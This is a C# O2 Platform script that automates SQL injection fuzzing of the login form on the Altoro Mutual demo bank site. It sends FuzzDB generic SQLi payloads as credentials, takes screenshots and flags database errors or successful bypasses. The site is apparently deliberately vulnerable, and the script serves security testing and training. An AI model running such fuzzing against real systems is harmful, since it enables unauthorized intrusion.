//var topPanel = panel.clear().add_Panel();
var topPanel = "Altoro - SQLi using FuzzDB (with screenshots)".popupWindow(1000,600); 
topPanel.insert_LogViewer();
 
var actionPanel = topPanel.insert_Above(20); 
var ie = topPanel.add_IE().silent(true); 
var treeView = topPanel.insert_Left(300).add_TreeView();

bool stopFuzz = false;

treeView.afterSelect<string>(
	(file)=>{
				ie.open_ASync(file); 
			});

Func<string,string,bool> login = 
    (username, password)=>{
                var loginUrl = "http://demo.testfire.net/bank/login.aspx";
                ie.open(loginUrl);
                ie.field("uid").value(username);
                ie.field("passw").value(password);
                ie.button("Login").click();
                return ie.url() != loginUrl;
              };

Action startFuzz =
	()=>{				
			stopFuzz = false;
			var fuzzDb = new API_FuzzDB();
			foreach(var payload in fuzzDb.payloads_SQLi_Generic())
			{				
			    "sending payload payload: {0}".info(payload);
			    var loginResult = login(payload, payload);   
			    treeView.add_Node(payload, topPanel.screenshot().save())      
			    	    .color(  (ie.IE.Html.contains("System.Data.OleDb") || loginResult)
			    	    			? Color.DarkRed
			    					: Color.DarkGreen);
			    
			    if (stopFuzz)
				{
					treeView.add_Node("Fuzz stop request received").color(Color.Red); 
					break;
				}    
			}
		};

Action saveResults = 
	()=>{
			var results = new Items();
			foreach(var node in treeView.nodes())
				results.add(node.get_Text(), node.get_Tag().str()); 
			var savedResultsFile = results.save();
			"results file saved to : {0}".info(savedResultsFile);
			savedResultsFile.showInCodeViewer();
		};

actionPanel.add_Link("Start SQLi Fuzz", 4,0, ()=> startFuzz())
		   .append_Link("Stop Fuzz", ()=> stopFuzz = true)
		   .append_Link("Save results" , ()=> saveResults());

ie.open( "http://demo.testfire.net");
		
return "done";

//using O2.XRules.Database.APIs

//O2File:API_FuzzDB.cs
//O2File:API_Cropper.cs
//using FluentSharp.Watin

//O2Ref:FluentSharp.Watin.dll
//O2Ref:Watin.Core.dll
//O2Ref:Microsoft.mshtml.dll



